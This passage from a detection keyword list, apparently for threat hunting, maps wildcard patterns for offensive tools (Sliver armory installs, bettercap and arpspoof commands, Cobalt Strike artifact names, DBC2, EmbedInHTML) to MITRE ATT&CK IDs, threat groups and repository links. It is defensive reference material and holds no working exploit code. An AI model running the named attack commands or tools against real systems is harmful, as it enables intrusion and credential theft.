harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,0,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*armitage.exe*,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,1,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z -*armory install *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install .net-execute*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install .net-pivot*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install .net-recon*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - 
TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install situational-awareness*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install windows-bypass*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*armory install windows-pivot*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*Arno0x/DBC2*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Arno0x/EmbedInHTML*,offensive_tool_keyword,EmbedInHTML,What this tool does is 
taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,N/A,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*Arno0x/WebDavC2*,offensive_tool_keyword,WebDavC2,WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.,T1571 - T1210.001 - T1190,TA0003 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Arno0x/WebDavC2,1,0,N/A,10,10,116,72,2019-08-27T06:51:42Z,2017-09-07T14:00:28Z -*arp.spoof on*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*arp.spoof.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*arp.spoof.targets*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation 
tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*arp_spoof.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*arpspoof -i *,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*ArpSpoofer*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*arpspoofing.py *,offensive_tool_keyword,arpspoofing,arp spoofing scripts,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/arpspoofing,1,0,N/A,N/A,1,15,1,2022-03-10T04:44:36Z,2021-06-29T22:57:51Z -*arsenal_kit.cna*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact.cna*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact.cna*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact.x64.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifact.x86.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifact.x86.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifact_payload*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z
-*artifact_payload*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifact_stageless*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z
-*artifact_stageless*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifact_stager*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z
-*artifact_stager*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifact32*.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*artifact32.dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
